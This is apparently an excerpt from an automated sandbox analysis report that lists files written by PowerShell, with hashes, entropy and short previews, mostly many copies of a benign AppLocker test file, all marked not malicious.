                                    SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                    MD5:859802284B12C59DDBB85B0AC64C08F0
                                    SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                    SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                    SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                    Malicious:false
                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:modified
                                    Size (bytes):28398
                                    Entropy (8bit):5.063590717663346
                                    Encrypted:false
                                    SSDEEP:768:TLbV3IpNBQkj2Uh4iUxkOZhxCardFvJOOdB8tAHkLNZzNKe1MlYo7YPU:TLbV3CNBQkj2Uh4iUxkOgqdJJOOdB8tu
                                    MD5:E489B959E14B529323FF0CFBF6CB9E56
                                    SHA1:B6150F38208711CD985C3434E62B37D1A71845B5
                                    SHA-256:AA30F61810AEE09A2FC4AEC7662809B7ADC47287FAF312DCFD0CF983B80AAE0E
                                    SHA-512:CE9985AFD0EB08BA7B4755735BCD609089040D8D59948C0776072C4A90B13C46FB8847A673E86A75777A0BEECF7C4E0EBAE53561AD8186F7A481EF57B48A39B6
                                    Malicious:false
                                    Preview:PSMODULECACHE.-...m.\3.z..q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...Reset-DAClientExperienceConfiguration........Remove-DAEntryPointTableItem........New-DAEntryPointTableItem....#...Get-DAClientExperienceConfiguration....#...Disable-DAManualEntryPointSelection........Rename-DAEntryPointTableItem.........)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScr
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):64
                                    Entropy (8bit):0.34726597513537405
                                    Encrypted:false
                                    SSDEEP:3:Nlll:Nll
                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                    Malicious:false
                                    Preview:@...e...........................................................
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
